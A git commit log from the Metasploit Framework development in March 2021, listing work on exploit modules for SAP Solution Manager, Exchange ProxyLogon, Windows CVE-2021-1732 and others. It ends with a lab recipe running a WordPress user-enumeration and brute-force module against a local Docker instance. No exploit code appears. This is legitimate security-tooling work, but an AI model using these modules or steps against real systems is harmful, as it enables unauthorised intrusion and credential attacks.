Spencer McIntyre 006faaab9a Land #14924, Add auxiliary and exploit modules for CVE-2020-6207 in SAP Solution Manager 2021-03-25 17:48:56 -04:00
Grant Willcox 728f819581 Land #14949, Fix library loading issues when switching between pry and irb 2021-03-25 15:47:05 -05:00
Alan Foster 2e92bd1227 Fix switching between pry and irb 2021-03-25 20:08:26 +00:00
kalba-security 65b35e4e6a Remove unnecessary empty check for nagios_rce_version_prior hash 2021-03-25 15:06:27 -04:00
kalba-security 122dbbea1e Add additional supported modules. Align results when printing in scanner. 2021-03-25 15:01:05 -04:00
kalba-security 6d1986e8ca Avoid mixing return types in login.rb 2021-03-25 14:13:55 -04:00
Metasploit 9033dd19bc Bump version of framework to 6.0.38 2021-03-25 12:04:45 -05:00
William Vu 0b8ac121d4 Fix fail_with usage in advantech_iview_unauth_rce
Brain fart. Should be print_warning so as not to fail the session.
2021-03-25 11:33:41 -05:00
Metasploit 75e8fef7de automatic module_metadata_base.json update 2021-03-25 11:07:15 -05:00
Grant Willcox 784927a389 Land #14941, Force smb_relay module to use the Rex SMB client over ruby_smb 2021-03-25 10:55:07 -05:00
RAMELLA Sébastien 75041c5837 update proxylogon rce 2021-03-25 19:46:58 +04:00
kalba-security 16067d2801 Make sure to always call rce_check correctly 2021-03-25 11:24:25 -04:00
kalba-security 707f163e15 Avoid type mixing as much as possible, add other feedback from code review 2021-03-25 11:19:31 -04:00
Vladimir Ivanov b066145cf1 Minor updates
Updated documentation auxiliary module cve_2020_6207_solman_rce.md
Updated documentation in exploit module cve_2020_6207_solman_rs.md
2021-03-25 17:07:20 +03:00
RAMELLA Sébastien 3027028954 Merge pull request #1 from rapid7/master
Update fork
2021-03-25 17:34:06 +04:00
Vladimir Ivanov 3b8f3620d2 Minor updates
Updated action_exec in auxiliary module cve_2020_6207_solman_rce.rb
Updated execute_command in exploit module cve_2020_6207_solman_rs.rb
2021-03-25 15:37:29 +03:00
Vladimir Ivanov 0487e451cf Updated payload
Updated make_rce_payload, renamed get_agent_os to check_agent in lib sap_sol_man_eem_miss_auth.rb
Updated action_ssrf, action_exec in auxiliary module cve_2020_6207_solman_rce.rb
Updated execute_command, exploit in exploit module cve_2020_6207_solman_rs.rb
2021-03-25 14:20:54 +03:00
Vladimir Ivanov 391e013d89 Removed var lhost, lport in exploit module cve_2020_6207_solman_rs.rb
Changed fail reason if agent_name is nil in lib sap_sol_man_eem_miss_auth.rb
2021-03-25 11:26:14 +03:00
Metasploit f165515cf8 automatic module_metadata_base.json update 2021-03-24 17:48:24 -05:00
bwatters 6505f9ccbd Land #14830, Adding FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (CVE-2021-3378)
Merge branch 'land-14830' into upstream-master
2021-03-24 17:41:10 -05:00
bwatters 5394464932 Fix rubocop complaint 2021-03-24 17:38:11 -05:00
bwatters e2dfca86f9 Add warning for failures after rebooting to the documentation. 2021-03-24 17:32:08 -05:00
Grant Willcox 14efac6a71 Land #14927, Add signal rescue to tools/exploit/* Ruby scripts to avoid long call traces 2021-03-24 15:52:48 -05:00
pingport80 309e39c45a remove backtraces from ruby scripts 2021-03-24 14:52:19 -05:00
dwelch-r7 a69d76d7b5 Force smb_relay module to use the Rex SMB client over ruby_smb 2021-03-24 17:36:50 +00:00
Grant Willcox 0905202e6c Land #14878, Wrap loader to enable tweaks 2021-03-24 11:22:48 -05:00
Metasploit 622adb88df automatic module_metadata_base.json update 2021-03-24 10:30:36 -05:00
Grant Willcox f01b434160 Land #14896, Fix apache_activemq_upload_jsp exploit module for Java 8 2021-03-24 10:22:03 -05:00
Grant Willcox 9d7e9990f4 Update documentation wording a bit to be more appropriate 2021-03-24 09:17:22 -05:00
Vladimir Ivanov 924f7feb76 Updated Arch in the exploit module cve_2020_6207_solman_rs.rb
Corrected by rubocop library sap_sol_man_eem_miss_auth.rb
2021-03-24 16:26:01 +03:00
Vladimir Ivanov 66ce45d833 Added support for CmdStager in the exploit module cve_2020_6207_solman_rs.rb 2021-03-24 16:16:43 +03:00
Vladimir Ivanov d28bcdc821 Updated action_ssrf, action_exec in auxiliary cve_2020_6207_solman_rce.rb 2021-03-24 16:05:34 +03:00
Vladimir Ivanov abe8c73be9 Added get_agent_os in lib sap_sol_man_eem_miss_auth.rb 2021-03-24 16:03:20 +03:00
dwelch-r7 a9d38ecc15 Land #14430, Add warnings for no db connection while using uuid tracking 2021-03-24 12:12:18 +00:00
Vladimir Ivanov 567f78c532 Update PAYLOAD_XML, check_response in lib sap_sol_man_eem_miss_auth.rb
Delete class var agents in auxiliary and exploit modules
2021-03-24 11:21:57 +03:00
Metasploit 04e8752b9b automatic module_metadata_base.json update 2021-03-23 16:13:53 -05:00
Grant Willcox a77e7390d2 Land #14933, Update metasploit_payloads-mettle gem to 1.0.7 2021-03-23 16:06:43 -05:00
Vladimir Ivanov 8c7a483f6e Delete analyze_error in exploit module cve_2020_6207_solman_rs.rb 2021-03-23 23:59:48 +03:00
Vladimir Ivanov 6aba44c4d5 Delete analyze_error in auxiliary module cve_2020_6207_solman_rce.rb 2021-03-23 23:59:20 +03:00
Vladimir Ivanov ce8a3eea12 Update check_response in lib sap_sol_man_eem_miss_auth.rb 2021-03-23 23:57:40 +03:00
Vladimir Ivanov 2c18435e6e Update pretty_agents_table in lib sap_sol_man_eem_miss_auth.rb
Change output in auxiliary and exploit modules
2021-03-23 23:00:34 +03:00
Grant Willcox 7580100964 Land #14938, Add time command 2021-03-23 14:35:24 -05:00
Vladimir Ivanov 81a22503d9 Update enable_eem, script_action in lib sap_sol_man_eem_miss_auth.rb 2021-03-23 22:20:46 +03:00
Grant Willcox 26055e12ff Land #14934, Fix encoding issues when downloading a utf-8 directory directly within Meterpreter 2021-03-23 14:04:41 -05:00
Tim W 95c384c0cb fix downloading utf-8 file into a ascii name 2021-03-23 17:35:25 +00:00
Alan Foster 9bb8eaaded Add time command 2021-03-23 16:45:29 +00:00
Vladimir Ivanov 4399fa73fc Update make_rce_payload, make_soap_body in lib sap_sol_man_eem_miss_auth.rb
Update rce command in auxiliary module cve_2020_6207_solman_rce.rb
2021-03-23 19:02:59 +03:00
Metasploit 6b36db4c26 automatic module_metadata_base.json update 2021-03-23 10:16:46 -05:00
Jeffrey Martin 2f98e990ab Land 14598, docker: hassle-free DB bootstrap 2021-03-23 10:04:02 -05:00
Vladimir Ivanov d5ac1f8078 Update make_ssrf_payload, make_rce_payload, make_soap_body in lib sap_sol_man_eem_miss_auth.rb 2021-03-23 17:41:06 +03:00
Vladimir Ivanov 70a46d411e Update make_agents_array in lib sap_sol_man_eem_miss_auth.rb 2021-03-23 16:18:27 +03:00
Spencer McIntyre 79967f2179 Land #14844, Move on_session_open event to after the session has been bootstrapped 2021-03-23 08:50:18 -04:00
Christophe De La Fuente 2dcd0fad04 Land #14860, Auxiliary/Exploit Scanner/Gather/RCE for Exchange ProxyLogon (CVE-2021-26855) 2021-03-23 13:10:15 +01:00
dwelch-r7 88f9f926f2 Remove duplicate event 2021-03-23 11:42:26 +00:00
Vladimir Ivanov 0fae3f4805 Added conditions in options in auxiliary module cve_2020_6207_solman_rce.rb 2021-03-23 14:02:12 +03:00
Vladimir Ivanov d76224066f Rename option URIPATH to TARGETURI 2021-03-23 13:33:39 +03:00
Vladimir Ivanov 113dce79de Move lib/metasploit/framework/sap_solman/client.rb to lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb 2021-03-23 13:20:27 +03:00
Christophe De La Fuente a6cd7c9b30 Rubocop update - JSON Unnecessary symbol conversion 2021-03-23 10:58:03 +01:00
Metasploit 16bed72858 automatic module_metadata_base.json update 2021-03-22 20:25:44 -05:00
Grant Willcox 90cc472bfe Land #14893, Updating avast_memory_dump.rb - Adding additional AVDump.exe file paths 2021-03-22 20:10:21 -05:00
Tim W afecde20d5 Fix #14888, fix downloading a utf-8 directory directly 2021-03-22 22:16:32 +00:00
Tim W ae322abbdf update payloads cached size 2021-03-22 21:49:50 +00:00
Tim W dd3a1d07e5 Update metasploit_payloads-mettle gem to 1.0.7 2021-03-22 21:49:46 +00:00
Spencer McIntyre 20ae05fd77 Land #14930, Fix search command highlighting for single characters 2021-03-22 17:35:30 -04:00
Metasploit 10036e6311 automatic module_metadata_base.json update 2021-03-22 16:08:19 -05:00
Spencer McIntyre 88eaf43989 Land #14920, Add Advantech iView CVE-2021-22652 exploit 2021-03-22 17:01:34 -04:00
RAMELLA Sébastien 37b0552803 last code review before land 2021-03-22 23:20:40 +04:00
William Vu d4d9001c84 Fix typos 2021-03-22 14:16:45 -05:00
William Vu 4dc860cce3 Update Spencer credit 2021-03-22 14:14:12 -05:00
Spencer McIntyre 8605fe4529 Use POST for the check method and write the module docs 2021-03-22 15:04:21 -04:00
Alan Foster d63ff8a559 Fix search command for single characters 2021-03-22 19:02:31 +00:00
Metasploit 81a37dde11 automatic module_metadata_base.json update 2021-03-22 13:07:36 -05:00
Grant Willcox cf03083dab Land #14879, Fix error when running ssh_login_pubkey.rb against a directory/file and improve error handling 2021-03-22 13:00:26 -05:00
Metasploit 30126239e4 automatic module_metadata_base.json update 2021-03-22 09:41:37 -05:00
Spencer McIntyre b8fb47d96c Land #14921, Update metasploit-payloads gem to 2.0.39 2021-03-22 10:34:46 -04:00
Vladimir Ivanov 4738bcc3c4 Correct style in client.rb 2021-03-22 13:10:50 +03:00
Vladimir Ivanov 2a48dd265d Replace class var @@agents with a class instance var in auxiliary and exploit modules. 2021-03-22 12:13:04 +03:00
Vladimir Ivanov 6e13a26fd3 Delete links to launchpad.support.sap.com in doc files 2021-03-22 11:03:53 +03:00
RAMELLA Sébastien 09b844653b remove DisablePayloadHandler and add x86 support 2021-03-22 00:30:01 +04:00
RAMELLA Sébastien c543b44fc2 fix: CmdStagerFlavor, add: Powershell target, ... 2021-03-21 22:47:27 +04:00
archcloudlabs 84ec2b1df7 avast_memory_dump path & function name mods 2021-03-21 12:45:13 -04:00
Vladimir Ivanov 42726a70c0 client.rb - library for auxiliary and exploit modules
cve_2020_6207_solman_rce.rb - auxiliary module
cve_2020_6207_solman_rce.md - documentation for auxiliary module
cve_2020_6207_solman_rs.rb - exploit module
cve_2020_6207_solman_rs.md - documentation for exploit module
2021-03-21 16:51:21 +03:00
alanfoster 308a42e95b Fix apache_activemq_upload_jsp exploit module for Java 8 2021-03-20 15:26:34 +00:00
sophosyaniv 4673e85ec7 add new options, use pgets instead of readline 2021-03-19 19:39:48 -07:00
sophosyaniv 1b130cdc74 add new options to documentation 2021-03-19 19:36:35 -07:00
William Vu 30629c2405 Remove JSP stub to-do
Spencer looked into this more thoroughly. The JSP stub is good.
2021-03-19 17:17:01 -05:00
William Vu 66d9cab44d Fix some things 2021-03-19 16:52:24 -05:00
William Vu ba58f41558 Sneak Spencer into credits 2021-03-19 16:52:15 -05:00
RAMELLA Sébastien f5c807590c a last round of review + rubocop 2021-03-20 01:23:43 +04:00
Spencer McIntyre 69a2eb4e43 Add a check method that relies on the version number 2021-03-19 16:48:33 -04:00
Tim W 39f730d5fb update payloads cached size 2021-03-19 20:34:33 +00:00
Tim W 05bb582a8f Update metasploit-payloads gem to 2.0.39 2021-03-19 20:31:59 +00:00
Grant Willcox 2126caf6a7 Land #14917, Add sort by category and reverse search results flags to the search command 2021-03-19 15:29:57 -05:00
Grant Willcox 9713402caf Add in more documentation to the help output, add support for searching by if modules have a check method or not, and support outputting an appropriate error message if the -s option is used with an invalid parameter 2021-03-19 15:01:58 -05:00
pingport80 332a076cec define sort, sort_options and desc 2021-03-19 15:01:56 -05:00
pingport80 bdf87c8080 add missing end 2021-03-19 15:01:56 -05:00
pingport80 d5ff94f101 add -s and -r options for search 2021-03-19 15:01:56 -05:00
pingport80 6584282b96 add sort to search command 2021-03-19 15:01:55 -05:00
Metasploit 19bc85fa1d automatic module_metadata_base.json update 2021-03-19 14:08:46 -05:00
adfoster-r7 a9af2d4542 Land #14815, replace ::Rex::Socket.gethostbyname with Socket.getaddrinfo 2021-03-19 19:02:45 +00:00
William Vu a012eddd1f Add Advantech iView CVE-2021-22652 exploit 2021-03-19 13:51:14 -05:00
RAMELLA Sébastien a81a9617fa add. aspnet_client as altenate write path 2021-03-19 22:01:41 +04:00
RAMELLA Sébastien ac573d0957 all modules code review. 2021-03-19 17:35:55 +04:00
cgranleese-r7 799ea56316 replace ::Rex::Socket.gethostbyname with Socket.getaddrinfo 2021-03-19 11:01:27 +00:00
RAMELLA Sébastien fa2fdc9b8a add. X-vDirObjectId header 2021-03-19 12:35:29 +04:00
RAMELLA Sébastien 6e34a80693 fix. OAB + code review 2021-03-19 10:19:57 +04:00
Metasploit 9bee43d660 automatic module_metadata_base.json update 2021-03-18 17:17:40 -05:00
Grant Willcox 341212c5f7 Land #14912, netgear_r6700_pass_reset - Fix check code typo and version check logic 2021-03-18 17:10:12 -05:00
Metasploit f9389eb7b2 automatic module_metadata_base.json update 2021-03-18 15:11:38 -05:00
Grant Willcox 8b859d2e17 Land #14910, Fix filezilla_client_cred.rb to only base64 decode strings inside tags specifically marked as being base64 encoded. 2021-03-18 15:03:57 -05:00
Metasploit 19e6e4310d automatic module_metadata_base.json update 2021-03-18 14:36:54 -05:00
bwatters 2c1869f9df Land #14907, Add exploit for CVE-2021-1732
Merge branch 'land-14907' into upstream-master
2021-03-18 14:29:59 -05:00
Metasploit 1bfc599892 automatic module_metadata_base.json update 2021-03-18 12:13:36 -05:00
bwatters fb7a97077f Land #14875,CVE-2021-21978 - VMWare View Planner Harness 4.6.x < 4.6 Security Patch 1 Arbitrary File Upload RCE
Merge branch 'land-14875' into upstream-master
2021-03-18 12:06:12 -05:00
Metasploit 4e3f21dd7b Bump version of framework to 6.0.37 2021-03-18 12:03:22 -05:00
kalba-security f340a06a4f use Rex::Version instead of Gem::Version, rebase to get relevant changes 2021-03-18 12:27:12 -04:00
kalba-security a38e2702c8 Add recommendations from code review, avoid returning checkcodes 2021-03-18 12:21:51 -04:00
kalba-security 26c1ca56d1 Add unauthenticated version check for older Nagios XI versions 2021-03-18 12:21:51 -04:00
kalba-security 9434f30665 Move login_after_install_or_license to mixin login.rb, minor improments 2021-03-18 12:21:51 -04:00
kalba-security acc38fd3a8 Add version parsing function to identify legacy systems 2021-03-18 12:21:51 -04:00
kalba-security 484d5eee09 Correct version ranges for supported exploit modules, update documentation, make sure to return cookies after authentication 2021-03-18 12:21:51 -04:00
kalba-security 2b081847fa Add functionality to complete Nagios XI install and sign license agreement, improve cookie filtering logic 2021-03-18 12:21:51 -04:00
kalba-security 1749addbd8 Improve html checks and make cookie handling compatible with older versions 2021-03-18 12:21:51 -04:00
kalba-security aab3b4a7ee Add Nagios XI mixin and auxiliary scanner module and docs 2021-03-18 12:21:51 -04:00
Metasploit cd8d6e6e12 automatic module_metadata_base.json update 2021-03-18 09:30:28 -05:00
Grant Willcox f82168a2cf Land #14914, abb_wserver_exec - Add CVE Reference 2021-03-18 09:22:10 -05:00
RAMELLA Sébastien c76e04e92b adjust SID 2021-03-18 15:23:21 +04:00
Metasploit fe0ea56f22 automatic module_metadata_base.json update 2021-03-17 18:00:42 -05:00
Grant Willcox e6a2aaefcf Land #14911, impersonate_ssl: added an SNI option for the ssl certificate request 2021-03-17 17:53:18 -05:00
Grant Willcox 2cd67b1950 Rework the get_cert method to make use of Rex library methods instead so that pivotting can still work 2021-03-17 17:36:17 -05:00
Grant Willcox 01c93c0d8a Apply more RuboCop fixes to clean up old code and remove some dangerous calls to eval() that weren't needed 2021-03-17 15:06:04 -05:00
Wes 42df4495a7 abb_wserver_exec - add CVE reference
add the cve for this

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5620
https://nvd.nist.gov/vuln/detail/CVE-2019-5620

cve was assigned years after public exploit code
2021-03-17 15:58:21 -04:00
RAMELLA Sébastien 7f80422272 replace module into a good dir 2021-03-17 23:45:13 +04:00
friedrico d7f03aaf80 getCert to snake case 2021-03-17 19:25:20 +01:00
Metasploit 8cf3bead59 Bump version of framework to 6.0.36 2021-03-17 12:32:39 -05:00
Adam Cammack 736369b643 Land #14905, Use ensure to run exploit cleanup 2021-03-17 11:56:09 -05:00
Metasploit 6cecc02b88 automatic module_metadata_base.json update 2021-03-17 10:04:47 -05:00
Grant Willcox 9d5799f4f9 Land #14913, OSVDB 100324 - update advisory link for abb_wserver_exec.rb 2021-03-17 09:56:21 -05:00
Wes 34674ce174 Update abb_wserver_exec.rb
update advisory link 

#2708
2021-03-17 09:59:15 -04:00
Metasploit 2a8277accb automatic module_metadata_base.json update 2021-03-17 08:33:18 -05:00
Spencer McIntyre 2ce0a90965 Land #14856, Fix method check for linux/ftp/proftp_telnet_iac module 2021-03-17 09:26:31 -04:00
Brendan Coles 71725d9366 netgear_r6700_pass_reset: Fix check and version check 2021-03-17 11:21:38 +00:00
friedrico a58a69d029 added an SNI option for the ssl certificate request 2021-03-17 09:10:48 +01:00
friedrico 3b5cdd767f Base64 encoding is set iff encoding attribute is set to base64 and not when it "could be due to length and alphabet of the password" 2021-03-17 08:49:28 +01:00
capme b99114787a re-adding first check, but not including [^ ] 2021-03-17 06:51:08 +07:00
capme 294a1a275c dropping extra version c that stated vulnerable 2021-03-17 06:20:59 +07:00
capme 26c653ef4a implement also for freebsd 2021-03-17 06:13:51 +07:00
Metasploit cec1b1fb06 automatic module_metadata_base.json update 2021-03-16 17:50:50 -05:00
Grant Willcox b1c3c49eb5 Land #14757, nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes 2021-03-16 17:43:43 -05:00
Spencer McIntyre f3df076067 Only upgrade the token of EProcess was found 2021-03-16 15:20:44 -04:00
RAMELLA Sébastien ecb201b98a add. check to get canary 2021-03-16 19:42:05 +04:00
Spencer McIntyre 1d365cdd75 Land #14906, remove random characters from yard-doc comment 2021-03-16 10:45:51 -04:00
Spencer McIntyre 0bff88c0c0 Update the module metadata and add module docs 2021-03-16 10:40:34 -04:00
Jeffrey Martin 13dae6730c remove random characters from yard-docs 2021-03-16 09:21:28 -05:00
Brendan Coles e30d8db082 nagios_xi_magpie_debug: add writable paths, improvements, cleanup, fixes
Resolve Rubocop violations
Fix off-by-one in array index triggered when no file upload succeeds
Fix cleanup: ensure files are removed when upload succeeds but execution fails
Add AutoCheck
Add module notes
Add error handling and associated operator feedback
Add additional writable paths required for some old Nagios versions
Add fallback to session as `apache` if privlege escalation fails
Update documentation in line with above changes and fix software download links
2021-03-16 07:13:55 +00:00
Jeffrey Martin 83d757f0dd use ensure for cleanup
There exists a possibility that cleanup can be missed when an exploit raises
an exception other than `Interrupt` when run, by shifting the cleanup into
`ensure` for all exceptions when `keep_handler` is not set handlers and
other cleanup tasks from a module will be called for more possible error
states.
2021-03-15 17:17:09 -05:00
Grant Willcox 50ef32c121 Land #14888, Fix #13798 and #14128 by fixing unicode issues on Meterpreter caused by unicode file/directory names 2021-03-15 16:46:21 -05:00
Spencer McIntyre c11900b9ab Add support for Windows 2004 & 20H2 2021-03-15 17:28:38 -04:00
RAMELLA Sébastien 72a4b58f4b add. missing headers 2021-03-16 00:08:56 +04:00
Metasploit 2c8faee542 automatic module_metadata_base.json update 2021-03-15 14:41:36 -05:00
bwatters ae5d31cb39 Land # 14776, Add Window Server 2012 SrClient DLL Hijacking local exploit module
Merge branch 'land-14776' into upstream-master
2021-03-15 14:34:35 -05:00
Spencer McIntyre 2e3d98a36a Move the DLL injection code into a reusable function 2021-03-15 11:47:02 -04:00
RAMELLA Sébastien d2df432eff fix. SID regex match 2021-03-15 19:38:53 +04:00
adfoster-r7 ce48d758b4 Land #14887, Fix RequestError class undefined method issue 2021-03-15 15:20:58 +00:00
Metasploit 09704e7fd3 automatic module_metadata_base.json update 2021-03-15 09:55:07 -05:00
adfoster-r7 125603db35 land #14898, Add rubocop rule to correct Gem::Version to Rex::Version 2021-03-15 14:48:08 +00:00
adfoster-r7 cb5fdb6cdd Land #14899, replace rexml autoload with an explicit require to prevent circular dependencies 2021-03-15 13:38:32 +00:00
dwelch-r7 6aaf44c902 rubocop files and make the exclusions more localised 2021-03-15 13:27:37 +00:00
Spencer McIntyre 4af9cacef8 Land #14897, Ensure documentation files have md extension 2021-03-15 09:26:44 -04:00
dwelch-r7 26e70a290a Replace rexml autoload with an explicit require to prevent circular dependencies 2021-03-15 12:15:31 +00:00
RAMELLA Sébastien 90dc3cdceb add. autodiscover check, and remove useless SID condition 2021-03-15 16:09:24 +04:00
RAMELLA Sébastien d2819bbb43 add. autodiscover check 2021-03-15 16:03:38 +04:00
kalba-security 98c04eae6c Remove TODO comment, update documentaton to include WAIT_FOR_TIWORKER option. 2021-03-15 07:51:12 -04:00
dwelch-r7 596e1fb6f8 Add rubocop rule to correct Gem::Version to Rex::Version 2021-03-15 11:17:47 +00:00
Alan Foster 9a92ac87a1 Ensure documentation files have md extension 2021-03-15 10:24:50 +00:00
Grant Willcox 57931956d9 Fix bad style again 2021-03-15 01:33:32 -05:00
capme b112cc52eb change variable into snake case 2021-03-15 06:39:55 +07:00
capme ea95048377 fix identation. make readable check version 3. fix logical operator 2021-03-15 06:34:53 +07:00
RAMELLA Sébastien e5c76bfe13 pass. rubocop 2021-03-15 01:16:34 +04:00
RAMELLA Sébastien 59955f0a32 add. timeout and fix. CmdStagerFLavor 2021-03-15 01:10:56 +04:00
RAMELLA Sébastien dcf2b69d6d add. exploitation module doc and some changes 2021-03-14 22:49:41 +04:00
Grant Willcox ecae6eb91a Update response check to explicitly check if the response body is empty and to remove unneeded safe navigation operator 2021-03-14 13:14:52 -05:00
archcloudlabs 2bf44f972c Adding additional AVDump.exe paths 2021-03-14 12:23:34 -04:00
Grant Willcox 6616112b59 Correct exploit ranking, wrap file restoration in ensure clause, fix typos, and address other review comments 2021-03-14 00:00:18 -06:00
Grant Willcox 89ce1c5229 Quick update to make the backdoor a bit stealthier by removing the extra Payload Success! message that wasn't needed 2021-03-14 00:00:17 -06:00
Grant Willcox a6c92a12a1 Add link to wvu's PoC and fix typo 2021-03-14 00:00:17 -06:00
Grant Willcox 4f2e299d8f Update the exploit to use Python as its payload since this is a lot more flexible, allows Meterpreter, returns a shell faster, and we are already injecting into and executing a Python file 2021-03-14 00:00:06 -06:00
Grant Willcox c2c5db95d8 Add in documentation and fix some mistakes in the description of the module 2021-03-14 00:00:05 -06:00
Grant Willcox 7d6e636114 Initial upload of exploit code for CVE-2021-21978 2021-03-13 23:59:47 -06:00
Tim W 54c07c301a Fix #13798, Fix #14128, fix meterpreter > ls within a unicode directory 2021-03-13 10:58:04 +00:00
Metasploit a428c5721d automatic module_metadata_base.json update 2021-03-12 19:15:40 -06:00
Grant Willcox 61f960dc34 Land #14824, Skip empty files for path traversal enumeration inside http_traversal.rb 2021-03-12 18:59:45 -06:00
Shelby Pace f46c7b81fe convert const name to str before check 2021-03-12 18:01:22 -06:00
RAMELLA Sébastien 47f16e56d9 add. exploit (for freeze other pull request) 2021-03-13 03:49:45 +04:00
Spencer McIntyre f0a9a1deb3 Add the initial exploit for CVE-2021-1732 2021-03-12 17:30:22 -05:00
Tim W 1a7704787f Fix #13798, Fix #14128, fix meterpreter > download * on utf-8 filenames 2021-03-12 19:51:40 +00:00
Metasploit c1f7de5861 automatic module_metadata_base.json update 2021-03-12 12:14:52 -06:00
Grant Willcox 8dce1acd64 Land #14794, dup_scout_enterprise_login_bof: Add v9.9.14 target and auto targeting 2021-03-12 12:07:57 -06:00
Metasploit 1b9f332407 automatic module_metadata_base.json update 2021-03-12 11:09:47 -06:00
Spencer McIntyre 3684bc6f30 Land #14661, payload/x86/exec with metasm conversoin and NULL free variant 2021-03-12 12:02:44 -05:00
Metasploit efde64f372 automatic module_metadata_base.json update 2021-03-12 11:01:40 -06:00
Grant Willcox ef97b33d74 Land #14877, Support more recent versions of Firefox's default profile directory 2021-03-12 10:53:09 -06:00
adfoster-r7 78cb8b7f9a Land #14863, Fix remote db imports 2021-03-12 16:11:36 +00:00
RAMELLA Sébastien 854e949ce2 add. autodiscover feature (and others change) 2021-03-12 14:49:30 +04:00
RAMELLA Sébastien b8da46600b fix. according on nmap nse script 2021-03-12 14:33:04 +04:00
Grant Willcox 94dbe9f39e Land #14882, Fix Wordpress user login validation for recent versions of WordPress 2021-03-11 16:47:42 -06:00
Grant Willcox 4c0da1c82f Ninja commit to fix a typo 2021-03-11 16:46:50 -06:00
Geyslan G. Bem dc6dac3af1 payload/x86/exec.rb - logic inverted for readability
Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>
2021-03-11 19:11:34 -03:00
suryasaradhi 37eaf7944b Added changes to regex expression
Now the search will be for the exact user error
2021-03-12 03:12:58 +05:30
Geyslan G. Bem 1da8c111b7 payloads/x86/exec.rb - set NullFreeVersion as required
Set NullFreeVersion as a required option.
Remove nullfreeversion redundant assignment.

Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>
2021-03-11 18:31:35 -03:00
Metasploit 563c481c67 Bump version of framework to 6.0.35 2021-03-11 15:23:10 -06:00
Jeffrey Martin da31abc7ee Land #14874i, Fix autoloading when using the rpc client 2021-03-11 15:08:27 -06:00
Metasploit 9505966dd1 automatic module_metadata_base.json update 2021-03-11 12:53:17 -06:00
Shelby Pace 9d734dbf40 Land #14732, add java deser mixin
Plus ysoserial improvements
2021-03-11 12:45:53 -06:00
suryasaradhi ae29e749c7 Fixed wordpress user login validation
## BUG

While trying using 

`module> auxiliary/scanner/http/wordpress_login_enum`

User validation does not occur correctly in wordpress 5.x



## Verification

- mkdir wordpress
- cd wordpress
- nano docker-compose.yml
- Enter the following into the file

```
version: '3.3'
services:
   db:
     image: mysql:5.7
     volumes:
       - db_data:/var/lib/mysql
     restart: always
     environment:
       MYSQL_ROOT_PASSWORD: somewordpress
       MYSQL_DATABASE: wordpress
       MYSQL_USER: wordpress
       MYSQL_PASSWORD: wordpress

   wordpress:
     depends_on:
       - db
     image: wordpress:latest
     ports:
       - "8000:80"
     restart: always
     environment:
       WORDPRESS_DB_HOST: db:3306
       WORDPRESS_DB_USER: wordpress
       WORDPRESS_DB_PASSWORD: wordpress
       WORDPRESS_DB_NAME: wordpress
volumes:
    db_data: {}
```
- sudo docker-compose up -d

- Follow the setup instructions at 127.0.0.1:8000 and set up a new user in WordPress.
- Start msfconsole
- creds add user:test
- use auxiliary/scanner/http/wordpress_login_enum
- set RHOSTS 127.0.0.1
- set RPORT 8000
- set DB_ALL_USERS true
- run

## Expected Output

```
msf6 > use auxiliary/scanner/http/wordpress_login_enum 
msf6 auxiliary(scanner/http/wordpress_login_enum) > show options

Module options (auxiliary/scanner/http/wordpress_login_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BLANK_PASSWORDS      false            no        Try blank passwords for all users
   BRUTEFORCE           true             yes       Perform brute force authentication
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false            no        Add all passwords in the current database to the list
   DB_ALL_USERS         false            no        Add all users in the current database to the list
   ENUMERATE_USERNAMES  true             yes       Enumerate usernames
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RANGE_END            10               no        Last user id to enumerate
   RANGE_START          1                no        First user id to enumerate
   RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                80               yes       The target port (TCP)
   SSL                  false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   TARGETURI            /                yes       The base path to the wordpress application
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME                              no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false            no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   VALIDATE_USERS       true             yes       Validate usernames
   VERBOSE              true             yes       Whether to print output for all attempts
   VHOST                                 no        HTTP server virtual host

msf6 auxiliary(scanner/http/wordpress_login_enum) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/http/wordpress_login_enum) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(scanner/http/wordpress_login_enum) > set DB_ALL_USERS true
DB_ALL_USERS => true
msf6 auxiliary(scanner/http/wordpress_login_enum) > run

[-] The connection was refused by the remote host (127.0.0.1:8080).
[-] / does not seem to be WordPress site
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wordpress_login_enum) > set RPORT 8000
RPORT => 8000
msf6 auxiliary(scanner/http/wordpress_login_enum) > run

[*] / - WordPress Version 5.6.1 detected
[*] 127.0.0.1:8000 - / - WordPress User-Enumeration - Running User Enumeration
[*] 127.0.0.1:8000 - / - WordPress User-Validation - Running User Validation
[*] / - WordPress User-Validation - Checking Username:'Administrator'
[-] 127.0.0.1:8000 - [1/4] - / - WordPress User-Validation - Invalid Username: 'Administrator'
[*] / - WordPress User-Validation - Checking Username:'administrator'
[-] 127.0.0.1:8000 - [2/4] - / - WordPress User-Validation - Invalid Username: 'administrator'
[*] / - WordPress User-Validation - Checking Username:'test'
[+] / - WordPress User-Validation - Username: 'test' - is VALID
[+] / - WordPress User-Validation - Found 1 valid user
[-] 127.0.0.1:8000 - [4/4] - / - WordPress User-Validation - Invalid Username: 'normal'
[*] 127.0.0.1:8000 - [5/4] - / - WordPress Brute Force - Running Bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wordpress_login_enum) > 

```

## Linked Issue

